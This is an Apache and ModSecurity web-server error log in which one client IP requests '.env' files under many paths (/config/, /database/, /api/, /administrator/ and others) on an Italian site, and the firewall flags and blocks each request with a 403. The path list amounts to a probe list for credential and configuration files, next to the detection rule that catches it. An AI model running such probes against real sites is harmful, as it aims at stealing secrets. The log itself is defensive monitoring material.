[Fri Nov 28 15:28:56.742969 2025] [:error] [pid 387717] [client 34.245.11.111:55334] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSmxqCMw1EmR5pybmSkOaQAAAAQ"]
[Fri Nov 28 15:28:56.743240 2025] [:error] [pid 387717] [client 34.245.11.111:55334] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSmxqCMw1EmR5pybmSkOaQAAAAQ"]
[Fri Nov 28 15:28:56.743476 2025] [:error] [pid 387717] [client 34.245.11.111:55334] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSmxqCMw1EmR5pybmSkOaQAAAAQ"]
[Fri Nov 28 15:28:57.105615 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSmxqelfIsf8iBzToT1BGAAAABg"]
[Fri Nov 28 15:28:57.105909 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSmxqelfIsf8iBzToT1BGAAAABg"]
[Fri Nov 28 15:28:57.106116 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSmxqelfIsf8iBzToT1BGAAAABg"]
[Fri Nov 28 15:28:57.411964 2025] [:error] [pid 387718] [client 34.245.11.111:55620] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSmxqV9Lt-0Mbj6WnMWiOAAAAAU"]
[Fri Nov 28 15:28:57.412261 2025] [:error] [pid 387718] [client 34.245.11.111:55620] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSmxqV9Lt-0Mbj6WnMWiOAAAAAU"]
[Fri Nov 28 15:28:57.412505 2025] [:error] [pid 387718] [client 34.245.11.111:55620] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSmxqV9Lt-0Mbj6WnMWiOAAAAAU"]
[Fri Nov 28 15:28:57.610265 2025] [:error] [pid 387719] [client 34.245.11.111:55782] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSmxqTBOnTBjW97FOq6CzgAAAAk"]
[Fri Nov 28 15:28:57.610611 2025] [:error] [pid 387719] [client 34.245.11.111:55782] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSmxqTBOnTBjW97FOq6CzgAAAAk"]
[Fri Nov 28 15:28:57.610841 2025] [:error] [pid 387719] [client 34.245.11.111:55782] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSmxqTBOnTBjW97FOq6CzgAAAAk"]
[Fri Nov 28 15:28:57.843831 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSmxqa9FOLCsq7MColttAwAAAAE"]
[Fri Nov 28 15:28:57.844056 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSmxqa9FOLCsq7MColttAwAAAAE"]
[Fri Nov 28 15:28:57.844237 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSmxqa9FOLCsq7MColttAwAAAAE"]
[Fri Nov 28 15:28:58.033204 2025] [:error] [pid 387720] [client 34.245.11.111:56056] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSmxqsvllV7ZEBccheD0sQAAAAs"]
[Fri Nov 28 15:28:58.033485 2025] [:error] [pid 387720] [client 34.245.11.111:56056] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSmxqsvllV7ZEBccheD0sQAAAAs"]
[Fri Nov 28 15:28:58.033766 2025] [:error] [pid 387720] [client 34.245.11.111:56056] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSmxqsvllV7ZEBccheD0sQAAAAs"]
[Fri Nov 28 15:28:58.356760 2025] [authz_core:error] [pid 387721] [client 34.245.11.111:56260] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Fri Nov 28 15:28:58.586487 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSmxqkM6gFne4-slYXlYrAAAABI"]
[Fri Nov 28 15:28:58.586720 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSmxqkM6gFne4-slYXlYrAAAABI"]
[Fri Nov 28 15:28:58.586917 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSmxqkM6gFne4-slYXlYrAAAABI"]
[Fri Nov 28 15:28:58.587969 2025] [:error] [pid 387723] [client 34.245.11.111:56504] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSmxqsk1KVkX0HNimsBn-AAAAA8"]
[Fri Nov 28 15:28:58.588225 2025] [:error] [pid 387723] [client 34.245.11.111:56504] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSmxqsk1KVkX0HNimsBn-AAAAA8"]
[Fri Nov 28 15:28:58.588410 2025] [:error] [pid 387723] [client 34.245.11.111:56504] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSmxqsk1KVkX0HNimsBn-AAAAA8"]
[Fri Nov 28 15:28:59.026884 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSmxq-lfIsf8iBzToT1BGQAAABg"]
[Fri Nov 28 15:28:59.027104 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSmxq-lfIsf8iBzToT1BGQAAABg"]
[Fri Nov 28 15:28:59.027326 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSmxq-lfIsf8iBzToT1BGQAAABg"]
[Fri Nov 28 15:28:59.577606 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSmxq0M6gFne4-slYXlYrQAAABI"]
[Fri Nov 28 15:28:59.577825 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSmxq0M6gFne4-slYXlYrQAAABI"]
[Fri Nov 28 15:28:59.578039 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSmxq0M6gFne4-slYXlYrQAAABI"]
[Fri Nov 28 15:28:59.579691 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSmxq-lfIsf8iBzToT1BGgAAABg"]
[Fri Nov 28 15:28:59.579986 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSmxq-lfIsf8iBzToT1BGgAAABg"]
[Fri Nov 28 15:28:59.580272 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSmxq-lfIsf8iBzToT1BGgAAABg"]
[Fri Nov 28 15:29:00.016229 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSmxrK9FOLCsq7MColttBAAAAAE"]
[Fri Nov 28 15:29:00.016521 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSmxrK9FOLCsq7MColttBAAAAAE"]
[Fri Nov 28 15:29:00.016761 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSmxrK9FOLCsq7MColttBAAAAAE"]
[Fri Nov 28 15:29:01.064750 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSmxra9FOLCsq7MColttBgAAAAE"]
[Fri Nov 28 15:29:01.064967 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSmxra9FOLCsq7MColttBgAAAAE"]
[Fri Nov 28 15:29:01.065159 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSmxra9FOLCsq7MColttBgAAAAE"]
[Fri Nov 28 15:29:01.568725 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSmxrUM6gFne4-slYXlYrwAAABI"]
[Fri Nov 28 15:29:01.568942 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSmxrUM6gFne4-slYXlYrwAAABI"]
